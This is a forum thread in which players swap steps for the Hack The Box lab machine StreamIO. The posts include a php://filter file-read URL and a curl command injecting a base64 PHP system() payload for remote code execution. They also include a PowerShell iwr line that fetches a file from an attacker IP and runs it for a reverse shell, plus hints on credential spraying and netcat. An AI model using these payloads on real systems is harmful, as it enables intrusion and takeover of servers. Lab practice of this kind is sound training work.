StreamIO - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
(June 5, 2022, 10:15 AM)NoobHTB Wrote:
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...

Can we use Winrm or PsExec for these creds?


Doesn't look like it no... Tried spraying with cme to no avail... WinRM also isn't open AFAIK
Reply
[code]curl -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" 'https://streamio.htb/admin/?debug=master.php&cmd=dir' | grep '' -A 9999 |grep '
' -B 9999 | tail -n +3 |head -n -1[/code]
Reply
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...


I found a MSSQL credential in login.php. Worth taking a look at.
Reply
(June 5, 2022, 11:29 AM)karhu Wrote:
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...


I found a MSSQL credential in login.php. Worth taking a look at.


Yeah already found that... I'm using the curl command that someone provided above which works great. Some of it isn't required though. I'm now having a hard time turning this RCE into a shell... I feel pretty dumb right now lol
Reply
Can anyone explain how did you dump the user table so fast? My sqlmap will take days to dump those 30 users
Reply
(June 5, 2022, 11:02 AM)jon01 Wrote:
(June 5, 2022, 08:03 AM)dude4695 Wrote: anyone got user shell ?


check the master.php code via php filter u will  see eval()


how to get reverse shell ?
Reply
Got shell via exec()... just upload and use nc
Reply
(June 5, 2022, 11:45 AM)qwerty173 Wrote:
(June 5, 2022, 11:29 AM)karhu Wrote:
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...


I found a MSSQL credential in login.php. Worth taking a look at.


Yeah already found that... I'm using the curl command that someone provided above which works great. Some of it isn't required though. I'm now having a hard time turning this RCE into a shell... I feel pretty dumb right now lol


Same lol

I tried mshta, which connected to my system, but then the webserver crashed. Finally got the reverse shell by using powershell:

cmd=powershell.exe+iwr+-uri+<IP>/<filename>.php+-outfile+"C:\Downloads\<filename>.php"
Then,
cmd=php.exe+..\..\..\Downloads\<filename>.php
Reply
Searching Martin...
Reply
can anyone give me steps to get rev shell ?
Reply


 Users viewing this thread: StreamIO - HTB [Discussion]: No users currently viewing.